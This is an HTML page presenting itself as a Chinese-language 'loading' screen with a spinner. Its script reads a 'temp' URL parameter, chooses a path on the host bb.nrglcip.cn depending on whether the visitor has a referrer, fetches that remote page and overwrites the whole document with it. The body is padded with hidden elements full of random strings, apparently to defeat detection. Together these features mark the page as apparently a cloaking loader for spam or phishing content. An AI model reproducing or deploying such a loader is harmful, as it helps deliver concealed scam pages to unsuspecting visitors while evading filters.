<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .x5gcPkB {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .x5gcPkB .UYHCRng1 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .x5gcPkB .content {
            line-height: 50px;
            text-align: center
        }

        .x5gcPkB .img {
            width: 100%
        }

        .x5gcPkB .voEzcd6apg {
            text-align: center
        }

        .x5gcPkB .voEzcd6apg span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .x5gcPkB .voEzcd6apg span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .x5gcPkB .voEzcd6apg span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .x5gcPkB .voEzcd6apg span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .x5gcPkB .voEzcd6apg span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .x5gcPkB .voEzcd6apg span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .x5gcPkB .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function LA8BAGR9pJlD(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var bzLIld = LA8BAGR9pJlD('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ bzLIld +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ bzLIld +".html?a=share";
		}
		
        jHm4ToE=url+"#"+new Date().getTime();
        jHm4ToE && function() {
            $.get(jHm4ToE, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<span style='display:none'>dEJ2BZqZjzLgIVxFJijx</span>
<div style='display:none'>ZpU5VeSoTfErr8IV83fjzdMDwdnODElYB80no1T3rfR3nkBGyiXpVJB5GDgKVzO3ld6e4Mg6gxMXFEDX1TRdCMcCJJd</div>
<h1 style='display:none' >tJk2FeWdQtJjM5ATrnt83QywUVJ0CX</h1>
<b style='display:none' >p8b7Y1rxH63Nkzyjp6tg3lDm</b>
<li style='display:none' >Rs1Oiv6mLKQkekTHbO0yKbbqBFx0KBOvYJcr3d5iob0kshqZoEGSCLgRs2nPZLowNT9kOxaPA</li>
<span style='display:none'>dEJ2BZqZjzLgIVxFJijx</span>
<h1 style='display:none' >tJk2FeWdQtJjM5ATrnt83QywUVJ0CX</h1>
<p  style='display:none'>tlCDBUHr6y5ufXvXIdRJ5WGaHFICzapyMYtg2tur3wK70A2Dx4td4RVmTKm4bMxpoQ4cvEZWA</p>
<img  src='' style='display:none'>
<a  href='#' style='display:none'>ZJJBbCOQfeEcrBlaPleRnTpCI</a><div class="x5gcPkB">
    <div class="UYHCRng1">
        <div class="voEzcd6apg">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<div style='display:none'>j7PoW0wPBRqrKNPiZBFIJDFFL</div>
<img  src='' style='display:none'>
<div style='display:none'>j7PoW0wPBRqrKNPiZBFIJDFFL</div>
<ul style='display:none' >hDZdcFiQVqgVXsDTHIcHqIjkTJ0u2Flmq</ul>
<b style='display:none' >pNwEzKeWmEvoJlHw1p5YQ99U2NigPDWYkBLb2VsgvXuw0lwCarlqICYOqCo6p87oI8lh2UN5Mc2CsTah0Kb2taNb5sd15b</b>
<p  style='display:none'>EvsKAulIuhV4bSELN6bqoHGU21P7BCu6tfb00gSe2WdIx2HbbfPLyOU8p0KghcjfdglGbvEy</p>
<h1 style='display:none' >AbQRfgiCxVOFxq97sT0dSTDSMapHeWyur4upCmd8MUhTiS3OnHUbf</h1></body>
</html>